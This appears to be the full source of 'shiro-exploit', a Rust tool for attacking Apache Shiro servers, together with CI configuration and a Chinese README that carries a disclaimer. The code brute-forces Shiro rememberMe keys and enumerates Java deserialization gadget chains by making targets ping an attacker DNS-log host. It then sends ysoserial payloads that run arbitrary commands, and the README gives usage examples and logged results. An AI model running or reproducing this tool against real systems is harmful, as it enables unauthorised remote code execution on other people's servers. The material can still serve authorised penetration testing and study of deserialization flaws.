├── .github ├── FUNDING.yml ├── dependabot.yml └── workflows │ ├── pre-commit.yml │ ├── committed.yml │ ├── audit.yml │ ├── release-notes.py │ ├── test.yml │ ├── codeql-analysis.yml │ └── post-release.yml ├── dev └── hooks │ ├── pre-commit.sample │ └── pre-commit ├── .editorconfig ├── .cargo └── config ├── CHANGELOG.md ├── .gitignore ├── .pre-commit-config.yaml ├── Cargo.toml ├── src ├── cli.rs ├── main.rs ├── yso.rs └── lib.rs ├── README.md └── LICENSE /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: [ cn-kali-team ] -------------------------------------------------------------------------------- /dev/hooks/pre-commit.sample: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 执行 fmt 脚本,如果不正确需要将退出码设为非零 3 | cargo fmt --all 4 | 5 | # 获取上面脚本的退出码 6 | exitCode="$?" 7 | exit $exitCode -------------------------------------------------------------------------------- /.editorconfig: -------------------------------------------------------------------------------- 1 | [*] 2 | charset = utf-8 3 | 4 | 5 | [*.pest] 6 | indent_style = space 7 | indent_size = 4 8 | 9 | [*.toml] 10 | indent_style = space 11 | indent_size = 4 -------------------------------------------------------------------------------- /.cargo/config: -------------------------------------------------------------------------------- 1 | [target.x86_64-pc-windows-msvc] 2 | rustflags = ["-Ctarget-feature=+crt-static"] 3 | 4 | [target.i686-pc-windows-msvc] 5 | rustflags = ["-Ctarget-feature=+crt-static"] 6 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | - package-ecosystem: cargo 4 | directory: "/" 5 | schedule: 6 | interval: monthly 7 | time: "07:00" 8 | open-pull-requests-limit: 10 9 | -------------------------------------------------------------------------------- /dev/hooks/pre-commit: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 执行 fmt 脚本,如果不正确需要将退出码设为非零 3 | cargo clippy --workspace --all-features --all-targets -- -D warnings --allow deprecated 4 | cargo fmt --all 5 | 6 | # 获取上面脚本的退出码 7 | exitCode="$?" 8 | exit $exitCode -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Change Log 2 | 3 | 4 | 5 | ## [Unreleased] - ReleaseDate 6 | 7 | ## [2022.10.10] - 2022.12.21 8 | 9 | ### Fixes 10 | 11 | - 更新命令行解析库为argh 12 | 13 | ## [2022.12.22] - 2022.12.22 14 | 15 | ### Fixes 16 | 17 | - 添加内置payload,添加爆破利用链 -------------------------------------------------------------------------------- /.github/workflows/pre-commit.yml: -------------------------------------------------------------------------------- 1 | name: pre-commit 2 | on: 3 | pull_request: 4 | push: 5 | branches: [main] 6 | jobs: 7 | pre-commit: 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/checkout@v2 11 | - uses: actions/setup-python@v2 12 | - uses: pre-commit/action@v2.0.3 13 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk 11 | 12 | .idea/ -------------------------------------------------------------------------------- /.github/workflows/committed.yml: -------------------------------------------------------------------------------- 1 | # Not run as part of pre-commit checks because they don't handle sending the correct commit 2 | # range to `committed` 3 | name: Lint Commits 4 | on: [pull_request] 5 | 6 | jobs: 7 | committed: 8 | name: Lint Commits 9 | runs-on: ubuntu-latest 10 | steps: 11 | - name: Checkout Actions Repository 12 | uses: actions/checkout@v2 13 | with: 14 | fetch-depth: 0 15 | - name: Lint Commits 16 | uses: crate-ci/committed@master 17 | -------------------------------------------------------------------------------- /.github/workflows/audit.yml: -------------------------------------------------------------------------------- 1 | name: Security audit 2 | on: 3 | pull_request: 4 | paths: 5 | - '**/Cargo.toml' 6 | - '**/Cargo.lock' 7 | push: 8 | paths: 9 | - '**/Cargo.toml' 10 | - '**/Cargo.lock' 11 | schedule: 12 | - cron: '3 3 3 * *' 13 | jobs: 14 | security_audit: 15 | runs-on: ubuntu-latest 16 | steps: 17 | - name: Checkout repository 18 | uses: actions/checkout@v2 19 | - uses: actions-rs/audit-check@v1 20 | with: 21 | token: ${{ secrets.GITHUB_TOKEN }} 22 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: check-yaml 6 | stages: [commit] 7 | - id: check-json 8 | stages: [commit] 9 | - id: check-toml 10 | stages: [commit] 11 | - id: check-merge-conflict 12 | stages: [commit] 13 | - id: check-case-conflict 14 | stages: [commit] 15 | - id: detect-private-key 16 | stages: [commit] 17 | - repo: https://github.com/crate-ci/committed 18 | rev: v1.0.1 19 | hooks: 20 | - id: committed 21 | stages: [commit-msg] 22 | -------------------------------------------------------------------------------- /.github/workflows/release-notes.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import argparse 4 | import re 5 | import pathlib 6 | import sys 7 | 8 | _STDIO = pathlib.Path("-") 9 | 10 | 11 | def main(): 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument("-i", "--input", type=pathlib.Path, default="CHANGELOG.md") 14 | parser.add_argument("--tag", required=True) 15 | parser.add_argument("-o", "--output", type=pathlib.Path, required=True) 16 | args = parser.parse_args() 17 | 18 | if args.input == _STDIO: 19 | lines = sys.stdin.readlines() 20 | else: 21 | with args.input.open() as fh: 22 | lines = fh.readlines() 23 | version = args.tag.lstrip("v") 24 | 25 | note_lines = [] 26 | for line in lines: 27 | if line.startswith("## ") and version in line: 28 | note_lines.append(line) 29 | elif note_lines and line.startswith("## "): 30 | break 31 | elif note_lines: 32 | note_lines.append(line) 33 | 34 | notes = "".join(note_lines).strip() 35 | if args.output == _STDIO: 36 | print(notes) 37 | else: 38 | args.output.write_text(notes) 39 | 40 | 41 | if __name__ == "__main__": 42 | main() 43 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shiro-exploit" #改这个 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Kali-Team "] 6 | include = ["LICENSE", "Cargo.toml", "src/**/*.rs"] 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [workspace] 10 | members = ["."] 11 | 12 | #https://github.com/johnthagen/min-sized-rust 13 | [profile.release] 14 | opt-level = "z" # Optimize for size. 15 | lto = true # Enable Link Time Optimization 16 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 17 | panic = "abort" # Abort on panic 18 | strip = true # Automatically strip symbols from the binary. 19 | 20 | [profile.dev.package."*"] 21 | opt-level = 3 22 | [profile.test] 23 | opt-level = 3 24 | lto = "thin" 25 | 26 | [profile.bench] 27 | lto = true 28 | codegen-units = 1 29 | opt-level = 3 30 | 31 | 32 | [dependencies] 33 | argh = "0.1.8" 34 | openssl = { version = "0.10", features = ["vendored"] } 35 | reqwest = { version = "0.11.6", features = [ 36 | "native-tls", 37 | "socks", 38 | "blocking", 39 | "gzip", 40 | "cookies", 41 | ] } 42 | anyhow = "1" 43 | tokio = { version = "1.19.2", default-features = false, features = [ 44 | "process", 45 | "macros", 46 | ] } 47 | encoding_rs = "0.8.28" 48 | mime = "0.3.16" 49 | select = "0.6.0" 50 | once_cell = "1.10.0" 51 | ysoserial_rs = { git = "https://github.com/emo-crab/ysoserial_rs" } 52 | uuid = { version = "1.2", features = ["serde", "v1", "v3", "v4"] } 53 | futures = { version = "0.3", features = ["compat"] } 54 | prettytable-rs = "0.9.0" 55 | -------------------------------------------------------------------------------- /src/cli.rs: -------------------------------------------------------------------------------- 1 | use argh::FromArgs; 2 | 3 | #[derive(Debug, Clone, FromArgs, Default)] 4 | #[argh(description = "shiro-exploit")] 5 | pub struct EmoArgs { 6 | /// you can specify known keys 7 | #[argh(option, default = "String::from(\"kPH+bIxk5D2deZiIxcaaaA==\")")] 8 | pub key: String, 9 | /// apache-shiro encryption algorithm,default: CBC 10 | #[argh(option, short = 'm')] 11 | pub mode: Option, 12 | /// the target 13 | #[argh(option, short = 't')] 14 | pub target: Option, 15 | /// serialize file 16 | #[argh(option, short = 's')] 17 | pub ser: Option, 18 | /// read the target from the file 19 | #[argh(option)] 20 | pub file: Option, 21 | /// read the key from the file 22 | #[argh(option)] 23 | pub keys: Option, 24 | /// export to the csv file 25 | #[argh(option)] 26 | pub csv: Option, 27 | /// proxy to use for requests (ex:[http(s)|socks5(h)]://host:port) 28 | #[argh(option)] 29 | pub proxy: Option, 30 | /// set request timeout 31 | #[argh(option, default = "default_timeout()")] 32 | pub timeout: u64, 33 | /// number of concurrent threads 34 | #[argh(option, default = "default_thread()")] 35 | pub thread: u32, 36 | /// enum chain mode 37 | #[argh(switch)] 38 | pub chain: bool, 39 | /// exploit mode 40 | #[argh(switch)] 41 | pub exploit: bool, 42 | /// dns identifier, default: 981tzg.ceye.io 43 | #[argh(option, default = "String::from(\"981tzg.ceye.io\")")] 44 | pub dns: String, 45 | /// select a payload 46 | #[argh(option, short = 'p')] 47 | pub payload: Option, 48 | /// command to execute 49 | #[argh(option, short = 'c')] 50 | pub command: Option, 51 | /// tomcat echo request header name 52 | #[argh(option)] 53 | pub echo_name: Option, 54 | /// tomcat command request header name 55 | #[argh(option)] 56 | pub command_name: Option, 57 | /// list all payload 58 | #[argh(switch, short = 'l')] 59 | pub list: bool, 60 | } 61 | 62 | fn default_thread() -> u32 { 63 | 100_u32 64 | } 65 | 66 | fn default_timeout() -> u64 { 67 | 10 68 | } 69 | 70 | impl EmoArgs { 71 | pub fn new() -> Self { 72 | let default: EmoArgs = argh::from_env(); 73 | default 74 | } 75 | pub fn get_method(&self) {} 76 | } 77 | -------------------------------------------------------------------------------- /.github/workflows/test.yml: -------------------------------------------------------------------------------- 1 | name: Test 2 | on: 3 | pull_request: 4 | paths: 5 | - '**' 6 | - '!/*.md' 7 | - '!/docs/**' 8 | - "!/LICENSE-*" 9 | push: 10 | branches: 11 | - main 12 | paths: 13 | - '**' 14 | - '!/*.md' 15 | - '!/docs/**' 16 | - "!/LICENSE-*" 17 | jobs: 18 | ci: 19 | name: CI 20 | needs: [ test,rustfmt,clippy ] 21 | if: github.actor != 'dependabot[bot]' 22 | runs-on: ubuntu-latest 23 | steps: 24 | - name: Done 25 | run: exit 0 26 | test: 27 | name: Test 28 | if: github.actor != 'dependabot[bot]' 29 | strategy: 30 | matrix: 31 | os: [ "ubuntu-latest", "windows-latest", "macos-latest" ] 32 | rust: [ "stable" ] 33 | continue-on-error: ${{ matrix.rust != 'stable' }} 34 | runs-on: ${{ matrix.os }} 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@v2 38 | - name: Install Rust 39 | uses: actions-rs/toolchain@v1 40 | with: 41 | toolchain: ${{ matrix.rust }} 42 | profile: minimal 43 | override: true 44 | - uses: Swatinem/rust-cache@v1 45 | - name: Build 46 | run: cargo test --no-run --workspace --all-features --all 47 | - name: Default features 48 | run: cargo test --workspace 49 | rustfmt: 50 | name: rustfmt 51 | if: github.actor != 'dependabot[bot]' 52 | runs-on: ubuntu-latest 53 | steps: 54 | - name: Checkout repository 55 | uses: actions/checkout@v2 56 | - name: Install Rust 57 | uses: actions-rs/toolchain@v1 58 | with: 59 | # Not MSRV because its harder to jump between versions and people are 60 | # more likely to have stable 61 | toolchain: stable 62 | profile: minimal 63 | override: true 64 | components: rustfmt 65 | - uses: Swatinem/rust-cache@v1 66 | - name: Check formatting 67 | run: cargo fmt --all -- --check 68 | clippy: 69 | name: clippy 70 | if: github.actor != 'dependabot[bot]' 71 | runs-on: ubuntu-latest 72 | steps: 73 | - name: Checkout repository 74 | uses: actions/checkout@v2 75 | - name: Install Rust 76 | uses: actions-rs/toolchain@v1 77 | with: 78 | toolchain: 1.58.1 # MSRV 79 | profile: minimal 80 | override: true 81 | components: clippy 82 | - uses: Swatinem/rust-cache@v1 83 | - uses: actions-rs/clippy-check@v1 84 | with: 85 | token: ${{ secrets.GITHUB_TOKEN }} 86 | args: --workspace --all-features --all-targets -- -D warnings --allow deprecated 87 | -------------------------------------------------------------------------------- /.github/workflows/codeql-analysis.yml: -------------------------------------------------------------------------------- 1 | # For most projects, this workflow file will not need changing; you simply need 2 | # to commit it to your repository. 3 | # 4 | # You may wish to alter this file to override the set of languages analyzed, 5 | # or to provide custom queries or build logic. 6 | # 7 | # ******** NOTE ******** 8 | # We have attempted to detect the languages in your repository. Please check 9 | # the `language` matrix defined below to confirm you have the correct set of 10 | # supported CodeQL languages. 11 | # 12 | name: "CodeQL" 13 | 14 | on: 15 | push: 16 | branches: [ "main" ] 17 | pull_request: 18 | # The branches below must be a subset of the branches above 19 | branches: [ "main" ] 20 | schedule: 21 | - cron: '37 16 * * 1' 22 | 23 | jobs: 24 | analyze: 25 | name: Analyze 26 | runs-on: ubuntu-latest 27 | permissions: 28 | actions: read 29 | contents: read 30 | security-events: write 31 | 32 | strategy: 33 | fail-fast: false 34 | matrix: 35 | language: [ 'python' ] 36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] 37 | # Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support 38 | 39 | steps: 40 | - name: Checkout repository 41 | uses: actions/checkout@v3 42 | 43 | # Initializes the CodeQL tools for scanning. 44 | - name: Initialize CodeQL 45 | uses: github/codeql-action/init@v2 46 | with: 47 | languages: ${{ matrix.language }} 48 | # If you wish to specify custom queries, you can do so here or in a config file. 49 | # By default, queries listed here will override any specified in a config file. 50 | # Prefix the list here with "+" to use these queries and those in the config file. 51 | 52 | # Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs 53 | # queries: security-extended,security-and-quality 54 | 55 | 56 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). 57 | # If this step fails, then you should remove it and run the build manually (see below) 58 | - name: Autobuild 59 | uses: github/codeql-action/autobuild@v2 60 | 61 | # ℹ️ Command-line programs to run using the OS shell. 62 | # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun 63 | 64 | # If the Autobuild fails above, remove it and uncomment the following three lines. 65 | # modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance. 66 | 67 | # - run: | 68 | # echo "Run, Build Application using script" 69 | # ./location_of_script_within_repo/buildscript.sh 70 | 71 | - name: Perform CodeQL Analysis 72 | uses: github/codeql-action/analyze@v2 73 | -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | use anyhow::Error; 2 | use futures::channel::mpsc::unbounded; 3 | use futures::stream::FuturesUnordered; 4 | use futures::StreamExt; 5 | use shiro_exploit::{print_results_and_save, read_file_to_target, yso, ShiroVerify, EMO_ARGS}; 6 | use std::collections::HashSet; 7 | 8 | #[tokio::main] 9 | async fn main() { 10 | match start().await { 11 | Ok(_) => {} 12 | Err(e) => println!("{}", e), 13 | } 14 | } 15 | 16 | async fn burst(mut sv: ShiroVerify) -> ShiroVerify { 17 | sv.burst_key().await; 18 | sv 19 | } 20 | 21 | async fn exploit(mut sv: ShiroVerify) -> ShiroVerify { 22 | // 爆破利用链 23 | if EMO_ARGS.chain { 24 | sv.enum_chain().await; 25 | } 26 | // 利用 27 | if EMO_ARGS.exploit { 28 | sv.exploit().await; 29 | } 30 | sv 31 | } 32 | 33 | async fn start() -> Result<(), Error> { 34 | if EMO_ARGS.list { 35 | yso::list(); 36 | } 37 | if let Some(p) = &EMO_ARGS.payload { 38 | yso::get_payload(p); 39 | } 40 | let mut targets = HashSet::new(); 41 | if let Some(target) = &EMO_ARGS.target { 42 | targets.insert(String::from(target)); 43 | } 44 | if let Some(file_path) = &EMO_ARGS.file { 45 | targets.extend(read_file_to_target(file_path)); 46 | } 47 | let mut vec_results: Vec = Vec::new(); 48 | let (verify_sender, mut verify_receiver) = unbounded(); 49 | let (mut burst_sender, mut burst_receiver) = unbounded(); 50 | let (mut results_sender, mut results_receiver) = unbounded(); 51 | //验证是不是shiro,相当与指纹识别 52 | let verify_handle = tokio::task::spawn(async move { 53 | let mut worker = FuturesUnordered::new(); 54 | let mut targets_iter = targets.iter(); 55 | for _ in 0..EMO_ARGS.thread { 56 | match targets_iter.next() { 57 | Some(target) => worker.push(ShiroVerify::new(target.to_string())), 58 | None => { 59 | break; 60 | } 61 | } 62 | } 63 | while let Some(sv) = worker.next().await { 64 | if let Some(target) = targets_iter.next() { 65 | worker.push(ShiroVerify::new(target.to_string())); 66 | } 67 | verify_sender.unbounded_send(sv).unwrap_or_default(); 68 | } 69 | true 70 | }); 71 | //爆破key 72 | let burst_handle = tokio::task::spawn(async move { 73 | let mut worker = FuturesUnordered::new(); 74 | for _ in 0..3 { 75 | match verify_receiver.next().await { 76 | Some(sv) => { 77 | worker.push(burst(sv)); 78 | } 79 | None => { 80 | break; 81 | } 82 | } 83 | } 84 | while let Some(sv) = worker.next().await { 85 | if let Some(sv) = verify_receiver.next().await { 86 | worker.push(burst(sv)); 87 | } 88 | burst_sender.start_send(sv).unwrap_or_default(); 89 | } 90 | true 91 | }); 92 | let chain_handle = tokio::task::spawn(async move { 93 | let mut worker = FuturesUnordered::new(); 94 | for _ in 0..3 { 95 | match burst_receiver.next().await { 96 | Some(sv) => { 97 | worker.push(exploit(sv)); 98 | } 99 | None => { 100 | break; 101 | } 102 | } 103 | } 104 | while let Some(sv) = worker.next().await { 105 | if let Some(sv) = burst_receiver.next().await { 106 | worker.push(exploit(sv)); 107 | } 108 | results_sender.start_send(sv).unwrap_or_default(); 109 | } 110 | true 111 | }); 112 | let (_r1, _r2, _r3) = tokio::join!(verify_handle, burst_handle, chain_handle); 113 | while let Some(sv) = results_receiver.next().await { 114 | if sv.target.is_some() { 115 | vec_results.push(sv); 116 | } 117 | } 118 | print_results_and_save(vec_results); 119 | Ok(()) 120 | } 121 | -------------------------------------------------------------------------------- /src/yso.rs: -------------------------------------------------------------------------------- 1 | use crate::EMO_ARGS; 2 | use once_cell::sync::Lazy; 3 | use reqwest::Url; 4 | use std::collections::HashMap; 5 | use std::process; 6 | use ysoserial_rs::*; 7 | 8 | type NoArgs = fn() -> Vec; 9 | type OneArgs = fn(&str) -> Vec; 10 | type TwoArgs = fn(&str, &str) -> Vec; 11 | 12 | pub static COMMAND_PAYLOAD_MAP: Lazy> = 13 | Lazy::new(|| -> HashMap<&str, OneArgs> { 14 | HashMap::from_iter([ 15 | ("bs1", get_commons_beanutils1 as OneArgs), 16 | ("cc1", get_commons_collections1), 17 | ("cc2", get_commons_collections2), 18 | ("cc3", get_commons_collections3), 19 | ("cc4", get_commons_collections4), 20 | ("cc5", get_commons_collections5), 21 | ("cc6", get_commons_collections6), 22 | ("cc7", get_commons_collections7), 23 | ("cck1", get_commons_collections_k1), 24 | ("cck2", get_commons_collections_k2), 25 | ("cck3", get_commons_collections_k3), 26 | ("cck4", get_commons_collections_k4), 27 | ("clojure", get_clojure), 28 | ("groovy1", get_groovy1), 29 | ("hibernate1", get_hibernate1), 30 | ("hibernate2", get_hibernate2), 31 | ("javassist_weld1", get_javassist_weld1), 32 | ("jboss_interceptors1", get_jboss_interceptors1), 33 | ("jdk7u21", get_jdk7u21), 34 | ("jdk8u20", get_jdk8u20), 35 | ("json1", get_json1), 36 | ("mozilla_rhino1", get_mozilla_rhino1), 37 | ("mozilla_rhino2", get_mozilla_rhino2), 38 | ("myfaces1", get_myfaces1), 39 | ("rome", get_rome), 40 | ("spring1", get_spring1), 41 | ("spring2", get_spring2), 42 | ("vaadin1", get_vaadin1), 43 | ]) 44 | }); 45 | pub static URL_PAYLOAD_MAP: Lazy> = 46 | Lazy::new(|| -> HashMap<&str, OneArgs> { 47 | HashMap::from_iter([ 48 | ("url_dns", get_url_dns as OneArgs), 49 | ("c3p0", get_c3p0 as OneArgs), 50 | ]) 51 | }); 52 | pub static HEADER_PAYLOAD_MAP: Lazy> = 53 | Lazy::new(|| -> HashMap<&str, TwoArgs> { 54 | HashMap::from_iter([ 55 | ("cck1_tomcat_echo", get_cck1_tomcat_echo as TwoArgs), 56 | ("cck2_tomcat_echo", get_cck2_tomcat_echo as TwoArgs), 57 | ]) 58 | }); 59 | static SHIRO_PAYLOAD_MAP: Lazy> = Lazy::new(|| -> HashMap<&str, NoArgs> { 60 | HashMap::from_iter([("shiro_spc", get_shiro_simple_principal_collection as NoArgs)]) 61 | }); 62 | 63 | pub fn list() { 64 | println!("Payload List:\n------------"); 65 | let mut all_payload = COMMAND_PAYLOAD_MAP 66 | .keys() 67 | .map(|x| x.to_string()) 68 | .collect::>(); 69 | all_payload.extend( 70 | URL_PAYLOAD_MAP 71 | .keys() 72 | .map(|x| x.to_string()) 73 | .collect::>(), 74 | ); 75 | all_payload.extend( 76 | HEADER_PAYLOAD_MAP 77 | .keys() 78 | .map(|x| x.to_string()) 79 | .collect::>(), 80 | ); 81 | all_payload.extend( 82 | SHIRO_PAYLOAD_MAP 83 | .keys() 84 | .map(|x| x.to_string()) 85 | .collect::>(), 86 | ); 87 | all_payload.sort(); 88 | for p in all_payload { 89 | println!("{}", p); 90 | } 91 | process::exit(0); 92 | } 93 | 94 | pub fn get_payload(p: &str) -> Vec { 95 | if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) { 96 | if let Some(cmd) = &EMO_ARGS.command { 97 | command_func(cmd) 98 | } else { 99 | println!("该Payload需要指定执行的命令行"); 100 | process::exit(0); 101 | } 102 | } else if let Some(url_func) = URL_PAYLOAD_MAP.get(p as &str) { 103 | let payload = url_func(&format!("http://{}", &EMO_ARGS.dns)); 104 | payload 105 | } else if let Some(header_func) = HEADER_PAYLOAD_MAP.get(p as &str) { 106 | if let (Some(echo_name), Some(command_name)) = (&EMO_ARGS.echo_name, &EMO_ARGS.command_name) 107 | { 108 | header_func(echo_name, command_name) 109 | } else { 110 | println!("该Payload需要指定回显请求头和命令请求头"); 111 | process::exit(0); 112 | } 113 | } else if let Some(shiro_func) = SHIRO_PAYLOAD_MAP.get(p as &str) { 114 | shiro_func() 115 | } else { 116 | println!("请指定Payload"); 117 | process::exit(0); 118 | } 119 | } 120 | 121 | pub fn get_enum_chain_payload(p: &str, target: &Url) -> Vec { 122 | let dns = format!( 123 | "{}.{}.{}.{}", 124 | p, 125 | target.host_str().unwrap_or_default(), 126 | target.port_or_known_default().unwrap_or_default(), 127 | EMO_ARGS.dns 128 | ); 129 | let ping = format!("ping -n 2 -w 2 {}", dns); 130 | if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) { 131 | command_func(&ping) 132 | } else if let Some(url_func) = URL_PAYLOAD_MAP.get(p as &str) { 133 | return url_func(&format!("http://{}", &dns)); 134 | } else if let Some(header_func) = HEADER_PAYLOAD_MAP.get(p as &str) { 135 | if let (Some(echo_name), Some(command_name)) = (&EMO_ARGS.echo_name, &EMO_ARGS.command_name) 136 | { 137 | header_func(echo_name, command_name) 138 | } else { 139 | Vec::new() 140 | } 141 | } else { 142 | Vec::new() 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | > 郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。 2 | 3 | ## 使用方法 4 | 5 | ```bash 6 | ➜ ~ shiro-exploit --help 7 | Usage: shiro-exploit [--key ] [-m ] [-t ] [-s ] [--file ] [--keys ] [--csv ] [--proxy ] [--timeout ] [--thread ] [--chain] [--exploit] [--dns ] [-p ] [-c ] [--echo-name ] [--command-name ] [-l] 8 | 9 | shiro-exploit 10 | 11 | Options: 12 | --key you can specify known keys 13 | -m, --mode apache-shiro encryption algorithm,default: CBC 14 | -t, --target the target 15 | -s, --ser serialize file 16 | --file read the target from the file 17 | --keys read the key from the file 18 | --csv export to the csv file 19 | --proxy proxy to use for requests 20 | (ex:[http(s)|socks5(h)]://host:port) 21 | --timeout set request timeout 22 | --thread number of concurrent threads 23 | --chain enum chain mode 24 | --exploit exploit mode 25 | --dns dns identifier, default: 981tzg.ceye.io 26 | -p, --payload select a payload 27 | -c, --command command to execute 28 | --echo-name tomcat echo request header name 29 | --command-name tomcat command request header name 30 | -l, --list list all payload 31 | --help display usage information 32 | 33 | ``` 34 | 35 | ## 详细参数 36 | 37 | - `--key`指定Key,默认`kPH+bIxk5D2deZiIxcaaaA==` 38 | - `-m`指定加密模式,默认`CBC`,可选:`GCM` 39 | - `-t`单个目标 40 | - `-s`读入ysoserial生成的文件作为payload 41 | - `--file`从文件读入目标 42 | - `--keys`从文件读入key 43 | - `--csv`导出到csv文件 44 | - `--exploit`利用模式,爆破出key后,如果开启exploit模式会读入ysoserial生成的文件作为payload,如果`--ser` 45 | 参数为空,则为`--dns`作为URL_DNS的参数生成payload 46 | - `--dns`验证的DNS服务器,请求为目标的`主机名_端口.你的DNS记录服务器`,默认为`981tzg.ceye.io` 47 | - `-p`使用内置payload,配合`-c`或者`--dns`和`--echo-name`,`--command-name`,tomcat回显后面再更新 48 | - `-l`列出内置payload 49 | - `--chain`枚举利用链,结果查看DNS记录服务,前缀就是利用链名称。 50 | 51 | ## 使用ysoserial文件 52 | 53 | ```bash 54 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --ser /home/kali-team/1.ser 55 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 56 | | url | method | verify | mode | key | 57 | +=========================================================================+========+========+======+==========================+ 58 | | http://127.0.0.1:8080/login;jsessionid=EAEAD8C3FA8884D816F575E55B654694 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 59 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 60 | 61 | ``` 62 | 63 | ## 使用DNS记录验证漏洞 64 | 65 | ```bash 66 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io 67 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 68 | | url | method | verify | mode | key | 69 | +=========================================================================+========+========+======+==========================+ 70 | | http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 71 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 72 | 73 | ``` 74 | 75 | ## 爆破利用链 76 | 77 | - 主要利用ping命令带上利用链名称拼接到DNS前缀,如果能在DNS记录中看到说明可以使用该利用链 78 | 79 | ```bash 80 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain 81 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 82 | | url | method | verify | mode | key | 83 | +=========================================================================+========+========+======+==========================+ 84 | | http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 85 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 86 | 87 | ``` 88 | 89 | - 查看DNS记录得到可用利用链,说明`bs1`,`cck3`,`cc5`,`cc7`,`cck1`和`cc6`利用链可用 90 | 91 | ```csv 92 | 969227011 bs1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:20 93 | 969226980 bs1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:19 94 | 969226976 ccK3.127.0.0.1.8080.981tZG.cEYE.Io 127.0.0.1 2022-12-22 13:48:19 95 | 969226947 cc5.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 96 | 969226945 cc7.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 97 | 969226936 cCK3.127.0.0.1.8080.981tzg.ceyE.iO 127.0.0.1 2022-12-22 13:48:18 98 | 969226932 cck1.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:18 99 | 969226818 cc6.127.0.0.1.8080.981tzg.ceye.io 127.0.0.1 2022-12-22 13:48:14 100 | ``` 101 | 102 | ## 使用内置ysoserial 103 | 104 | - payload来自:(ysoserial_rs)[https://github.com/emo-cat/ysoserial_rs] 105 | - 例如使用利用`commons_collections_k1`链执行命令,使用`-p`指定利用链,`-c`指定要执行的命令 106 | 107 | ```bash 108 | ➜ ~ shiro-exploit -t http://127.0.0.1:8080 --exploit -p cck1 -c "ping qq.com" 109 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 110 | | url | method | verify | mode | key | 111 | +=========================================================================+========+========+======+==========================+ 112 | | http://127.0.0.1:8080/login;jsessionid=5FAF1087D2448C017C2959B2AC02CDAF | GET | true | CBC | kPH+bIxk5D2deZiIxcaaaA== | 113 | +-------------------------------------------------------------------------+--------+--------+------+--------------------------+ 114 | 115 | ``` -------------------------------------------------------------------------------- /.github/workflows/post-release.yml: -------------------------------------------------------------------------------- 1 | # The way this works is the following: 2 | # 3 | # The create-release job runs purely to initialize the GitHub release itself 4 | # and to output upload_url for the following job. 5 | # 6 | # The build-release job runs only once create-release is finished. It gets the 7 | # release upload URL from create-release job outputs, then builds the release 8 | # executables for each supported platform and attaches them as release assets 9 | # to the previously created release. 10 | # 11 | # The key here is that we create the release only once. 12 | # 13 | # Reference: 14 | # https://eugene-babichenko.github.io/blog/2020/05/09/github-actions-cross-platform-auto-releases/ 15 | 16 | name: post-release 17 | on: 18 | push: 19 | tags: 20 | - "v*" 21 | 